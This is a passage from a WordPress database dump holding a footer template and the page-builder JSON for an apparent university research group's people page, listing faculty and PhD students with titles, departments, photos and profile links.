gutters-col-md-1 gutters-col-2 gutters-col-v-lg-1 gutters-col-v-md-1 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-269-outer style-local-28-f4-outer\">\n            <div data-colibri-id=\"28-f4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-1 h-px-md-1 h-px-2 v-inner-lg-1 v-inner-md-1 v-inner-2 style-269 style-local-28-f4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"28-f5\" class=\"style-270 style-local-28-f5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-global-transition-all\">[colibri_copyright]© {year} {site-name}. Created for free using WordPress and\n                    <a target=\"_blank\" href=\"https://colibriwp.com\" rel=\"noopener\">Colibri</a>[/colibri_copyright]</div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','footer_post','','inherit','closed','closed','','28-revision-v1','','','2023-10-12 16:36:28','2023-10-12 20:36:28','',28,'https://gsudice.dataconn.net/?p=1665',0,'revision','',0),(1682,1,'2023-10-12 16:48:06','2023-10-12 20:48:06','https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-Hassan-Babaie-300x300-1.jpg','Hassan-Babaie-300x300','','inherit','open','closed','','hassan-babaie-300x300-3','','','2023-10-12 16:48:06','2023-10-12 20:48:06','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-Hassan-Babaie-300x300-1-e1697143646400.jpg',0,'attachment','image/jpeg',0),(1683,1,'2023-10-12 16:48:27','2023-10-12 20:48:27','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Faculty\",\"attrs\":{\"id\":\"faculty\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c4\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c4\",\"index\":0,\"id\":\"182-c5\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-cropped-headshot-1-e1651208089645-1-e1697138345727.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1646,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c4\",\"index\":0,\"id\":\"182-c6\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Chetan Tiwari\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c4\",\"index\":2,\"id\":\"182-c7\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Director<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c4\",\"index\":1,\"id\":\"182-c8\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=C5PVPkoAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c4\",\"index\":1,\"id\":\"182-c9\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c10\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c10\",\"index\":0,\"id\":\"182-c11\",\"partialId\":182,\"styleRef\":978,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-Portrait-1-1-e1697138676716.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1648,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c10\",\"index\":0,\"id\":\"182-c12\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Armin Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c10\",\"index\":2,\"id\":\"182-c13\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p> Chair and Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c10\",\"index\":1,\"id\":\"182-c14\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=41ckZZsAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c10\",\"index\":1,\"id\":\"182-c15\",\"partialId\":182,\"styleRef\":979,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c16\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c16\",\"index\":0,\"id\":\"182-c17\",\"partialId\":182,\"styleRef\":980,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-sunderraman1-e1697143080973.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1668,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c16\",\"index\":0,\"id\":\"182-c18\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Raj Sunderraman\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c16\",\"index\":2,\"id\":\"182-c19\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Chair and Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c16\",\"index\":1,\"id\":\"182-c20\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/raj-sunderraman-a5591bb2\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/raj-sunderraman\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?hl=en&user=Wlxc9FEAAAAJ\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c16\",\"index\":1,\"id\":\"182-c21\",\"partialId\":182,\"styleRef\":981,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c22\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c22\",\"index\":0,\"id\":\"182-c23\",\"partialId\":182,\"styleRef\":982,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-SRM-360x360-1-e1697143162762.png\",\"caption\":{\"text\":\"\"},\"imageId\":1670,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c22\",\"index\":0,\"id\":\"182-c24\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Susie Ramisetty-Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c22\",\"index\":2,\"id\":\"182-c25\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Research Associate Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c22\",\"index\":1,\"id\":\"182-c26\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Population Health Sciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/susie-ramisetty-mikler-7a0b3014\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/publichealth.gsu.edu\\/profile\\/susie-ramisetty-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=KzNVJwIAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354}]},\"parentId\":\"182-c22\",\"index\":1,\"id\":\"182-c27\",\"partialId\":182,\"styleRef\":983,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c40\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c40\",\"index\":0,\"id\":\"182-c41\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-zelikovsky-e1697143252884-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1673,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c40\",\"index\":0,\"id\":\"182-c42\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Alex Zelikovsky\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c40\",\"index\":2,\"id\":\"182-c43\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Distinguished University Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c40\",\"index\":1,\"id\":\"182-c44\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/alex-zelikovsky-48a2795\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/alex-zelikovsky\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=UzCRNJwAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c40\",\"index\":1,\"id\":\"182-c45\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c28\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c28\",\"index\":0,\"id\":\"182-c29\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-bourgeois-e1697143389924.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1675,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c28\",\"index\":0,\"id\":\"182-c30\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Anu Bourgeois\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c28\",\"index\":2,\"id\":\"182-c31\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c28\",\"index\":1,\"id\":\"182-c32\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anu-bourgeois-09b7b32b\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/anu-bourgeois\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=qsAUgQ8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c28\",\"index\":1,\"id\":\"182-c33\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c46\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c46\",\"index\":0,\"id\":\"182-c47\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/08\\/cropped-cropped-hu_new-1-e1697143455517.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1677,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c46\",\"index\":0,\"id\":\"182-c48\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Xiaolin Hu\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c46\",\"index\":2,\"id\":\"182-c49\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c46\",\"index\":1,\"id\":\"182-c50\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/csds.gsu.edu\\/profile\\/xiaolin-hu\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=zeU19nAAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c46\",\"index\":1,\"id\":\"182-c51\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c34\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c34\",\"index\":0,\"id\":\"182-c35\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-cropped-patterson-e1697143515399.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1679,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c34\",\"index\":0,\"id\":\"182-c36\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Murray Patterson\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c34\",\"index\":2,\"id\":\"182-c37\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Assistant Professor&nbsp;<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c34\",\"index\":1,\"id\":\"182-c38\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/murray-patterson-449a947\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/murray-patterson\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=X4J8vAEAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c34\",\"index\":1,\"id\":\"182-c39\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c52\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c52\",\"index\":0,\"id\":\"182-c53\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Taylor-shelton_300x300-e1697143561739.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1681,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c52\",\"index\":0,\"id\":\"182-c54\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Taylor Shelton\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c52\",\"index\":2,\"id\":\"182-c55\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Assistant Professor<\\/span><\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c52\",\"index\":1,\"id\":\"182-c56\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/taylor-shelton-28a4b3291\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/taylor-shelton\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=WFA1Ry8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c52\",\"index\":1,\"id\":\"182-c57\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c195\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c195\",\"index\":0,\"id\":\"182-c196\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-Hassan-Babaie-300x300-1-e1697143646400.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1682,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c195\",\"index\":0,\"id\":\"182-c197\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Hassan Babaie\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c195\",\"index\":2,\"id\":\"182-c198\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c195\",\"index\":1,\"id\":\"182-c199\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/geosciences.gsu.edu\\/profile\\/hassan-babaie\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.researchgate.net\\/profile\\/Hassan-Babaie\\/4\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c195\",\"index\":1,\"id\":\"182-c200\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"}],\"id\":\"182-c3\",\"parentId\":\"182-c2\",\"partialId\":182,\"styleRef\":971,\"type\":\"content\"}],\"id\":\"182-c2\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Faculty\"},\"id\":\"182-c60\",\"parentId\":\"182-c59\",\"partialId\":182,\"styleRef\":986,\"type\":\"content\"}],\"id\":\"182-c59\",\"parentId\":\"182-c58\",\"partialId\":182,\"styleRef\":985,\"type\":\"content\"}],\"id\":\"182-c58\",\"parentId\":\"182-c2\",\"partialId\":182,\"styleRef\":984,\"type\":\"content\"}]},\"styleRef\":970,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Grads\",\"attrs\":{\"id\":\"grads\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c63\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c63\",\"index\":0,\"id\":\"182-c64\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-282038166_2492815234187345_4129762528023780269_n-e1697142834100.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1659,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c63\",\"index\":0,\"id\":\"182-c65\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sundos Al Subhi<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c63\",\"index\":2,\"id\":\"182-c66\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c63\",\"index\":3,\"id\":\"182-c67\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sundos-al-subhi-88bb97150\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c63\",\"index\":1,\"id\":\"182-c68\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c69\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c69\",\"index\":0,\"id\":\"182-c70\",\"partialId\":182,\"styleRef\":849,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/06\\/cropped-IMG_1240-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1336,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c69\",\"index\":0,\"id\":\"182-c71\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Aaja Christie<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c69\",\"index\":2,\"id\":\"182-c72\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c69\",\"index\":3,\"id\":\"182-c73\",\"partialId\":182,\"styleRef\":901,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/aaja-christie-17573657\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c69\",\"index\":1,\"id\":\"182-c74\",\"partialId\":182,\"styleRef\":853,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c75\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c75\",\"index\":0,\"id\":\"182-c76\",\"partialId\":182,\"styleRef\":856,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-Emma.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":966,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c75\",\"index\":0,\"id\":\"182-c77\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Emma McDaniel<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c75\",\"index\":2,\"id\":\"182-c78\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"styleRef\":852,\"props\":{\"content\":\"<p>Computer 